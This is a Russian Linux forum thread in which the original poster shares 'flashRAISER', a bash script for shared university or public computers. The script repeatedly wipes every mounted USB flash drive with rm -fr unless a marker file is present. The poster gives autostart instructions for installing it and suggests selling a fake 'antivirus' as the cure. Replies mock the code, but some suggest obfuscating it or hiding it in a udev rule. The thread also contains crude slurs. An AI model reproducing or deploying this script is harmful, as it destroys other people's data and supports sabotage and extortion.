LINUX.ORG.RU
ФорумTalks

Fatal скрипт


0

0

Для студентов, у которых в универе бубунта и прочий линух, а также для общепользованых компов с линухом на борту)
Скрипт, создающий значительный баттхерт пользователям флешек.

#!/bin/bash
#flashRAISER by RFEA-R
ERD=/media
while true
do
cat /etc/mtab| grep ${ERD}| awk '{printf $2"/\n"}'| sed 's/\\040/ /'|
while read ser
do
((cat «${ser}.unRAISER»| grep FaND-RAISER) >/dev/null 2>/dev/null) ||
rm -fr «${ser}»
done
sleep 181
done


Очищает флешки, окроме содержащих файл unRAISER с текстом FaND-RAISER. Текст и файл меняете, ставите в автозапуск, а затем начинаете приторговывать «местечковым антивирусом»)

P.S. 2 LJ-user:v_martyanov - пердейший поклон и анальное штырево.

а кто сказал, что флешки монтируются в /media ?

mydoom ★★★
()

>while true

do


вот это быдлокод, активное ожидание

dimon555 ★★★★★
()

после закрытия терминала, этот скрипт полут SIGTERM и сдохнет

dimon555 ★★★★★
()

Как-то мне недавно попадался на глаза последний или предпоследний номер какера и там был подобный креатив - западлостроение для linux, не удивлюсь, что там что-то такое было.

dimon555 ★★★★★
()

>ERD

ERD => Еврейский Расовый Диск?

nikolayd
()

Статистика
Первая созданная тема: 29.11.2009 22:56:45
Последняя созданная тема: 29.11.2009 22:58:30
Первый комментарий: 29.11.2009 22:54:31
Последний комментарий: 29.11.2009 22:54:31

f3ex ★★
()

Ну хоть бы уже для приличия завернули всё это непотребство в base64 и пропустили через rot13, а вместо rm -rf вставили чуть подправленный знаменитый однострочник. Да и название переменных можно понепонятнее сделать. Фантазии, фантазии надо больше проявлять!

Cancellor ★★★★☆
()
Ответ на: комментарий от f3ex

> Статистика

а что ты ожидал там увидеть? свежий аккаунт скорее говорит о том что чувак давно на ЛОРе, дорожит своим администраторским аккаунтом, и поэтому для тупого троления заводит очередного виртуала.

pupok ★★
()

Бесконечный цикл, очищающий флешки? Да ты хакир!

xorik ★★★★★
()
Ответ на: комментарий от ZZaiatSS

>>ставите в автозапуск

Экий ты смешной

Да! В автозапуск. В гноме - в каталоге ~/.config/autostart/ создается .desktop файл стандартного содержания, задается в нем путь к скрипту, в конце файла пишется X-GNOME-Autostart-enabled=true и сам файл далается исполняемым. Все!

Rotor-x4
() автор топика
Ответ на: комментарий от pupok

Ну как бы ты и ответил на вопрос =) а так может кто и не заглядывает в статистику...

f3ex ★★
()
Ответ на: комментарий от Rotor-x4

>В гноме - в каталоге ~/.config/autostart/ создается .desktop файл стандартного содержания, задается в нем путь к скрипту

Кто тебя туда пустит? :)

файл делается исполняемым

Про noexec слышал?

ZZaiatSS ★★
()
Ответ на: комментарий от ZZaiatSS

Если делать в таком духе (расчитывая на админов-ламеров не знающих про ноекзеки и права доступа), по лучший вариант - написать правило удева. Никаких while true и прочего быдлокода, обнаружить тяжело.

ZZaiatSS ★★
()

P.S. мой photorec смотрит на это как...

ZZaiatSS ★★
()
Ответ на: комментарий от ZZaiatSS

>Кто тебя туда пустит? :)
А кто меня не пустит в каталог, находящийся в $HOME?

Про noexec слышал?

Флаг исполнения там для мебели. Точнее, чтоб гном не ругался что запускается незвестная прога. Тот же эффект поличтся, если создать реальный ярлык (через апплет управления автозапуском прог при входе), потом копируем .desktop-файл и правим в vim'е


лучший вариант - написать правило удева.


Для этого нужен рут.Здесь все из-под юзера.

Rotor-x4
() автор топика
Ответ на: комментарий от Rotor-x4

>В гноме - в каталоге ~/.config/autostart/ создается .desktop файл стандартного содержания, задается в нем путь к скрипту, в конце файла пишется X-GNOME-Autostart-enabled=true и сам файл далается исполняемым.

И как же ты залезешь пользователю в домашний каталог, если он закрыт на запись?

Elverion
()
Ответ на: комментарий от Elverion

>И как же ты залезешь пользователю в домашний каталог, если он закрыт на запись?

он предполагает, что там один пользователь, правда тогда надо бы сделать chown -R root .config, идея непонятна короче

dimon555 ★★★★★
()
Ответ на: комментарий от Elverion

Народ не врубилcя в концепцию.
Имеем: комп общего пользования (или в универе в комп. классе), в котором все сидят под одним эккаунтом. Вот и все.

Rotor-x4
() автор топика
Ответ на: комментарий от Rotor-x4

Epic fail. В таких ситуациях как «одноэккаунтный гостевой комп», домашний каталог пользователя пересоздается в момент логина, с предварительным сносом всего и вся.

no-dashi ★★★★★
()

Лучше бы полезное что сделал. Заводы стоят

yoghurt ★★★★★
()
Ответ на: комментарий от Rotor-x4

А кто меня не пустит в каталог, находящийся в $HOME?


:pwd ~
/home/zzaiatss
:mkdir my-cool-hack-directory ~
:sudo chown root:root my-cool-hack-directory ~
:cd my-cool-hack-directory ~
:touch my-super-skript ~/my-cool-hack-directory
touch: невозможно выполнить touch для `my-super-skript': Permission denied


oops?

Флаг исполнения там для мебели


На отличненько? При чем тут гном к ограничениям ФС? Какая неизвесная прога? ноекзек не дает запускать никаких скриптов/бинарников _не на уровне DE_ (могу ошибаться)

Для этого нужен рут


Для этого нужно sudo и известный пароль на юзера

ZZaiatSS ★★
()
Ответ на: комментарий от Rotor-x4

>в комп. классе

Даже мои друзья-вантузы (латеные, да. у них сервер на винде, раз в месяц зависал. лечилось перезагрузкой. вместо исправления причины зависания они в крон (или что там в винде) прописали ребут раз в 3 недели). Так вот, даже они осилили сделать так чтоб все конфиги юзеров грузились с сервака после перезагрузки. Т.е что бы ты там не делал, ребут - и все параметры сброшены.

ZZaiatSS ★★
()
Ответ на: комментарий от Dimanc

Елки палки...

Делает это админ, у которого есть отдельная учетка в которую он логинится через su и делает chown.

Это был просто пример, к фразе «кто меня не пустит в директорию бла-бла-бла»

ZZaiatSS ★★
()
Ответ на: комментарий от no-dashi

> В таких ситуациях как «одноэккаунтный гостевой комп», домашний каталог пользователя пересоздается в момент логина, с предварительным сносом всего и вся.

Может из образа разворачивается?

question4 ★★★★★
()

Эх били времена, когда поймав такого суперкакера с вирусом на дискете, можно было заявить его маме, что своим джедайским искусством он сломал железо и нужно купить новый комутер...

Fredy
()

ЕМНИП, в Гноме была такая «фича», что .desktop файлы лежащие в домашней директории запускались без execute бита.

daemonpnz ★★★★★
()

ололо, я в туалете всю бумагу украл, как и я всех наломал, я теперь кахирь.

Novell-ch ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.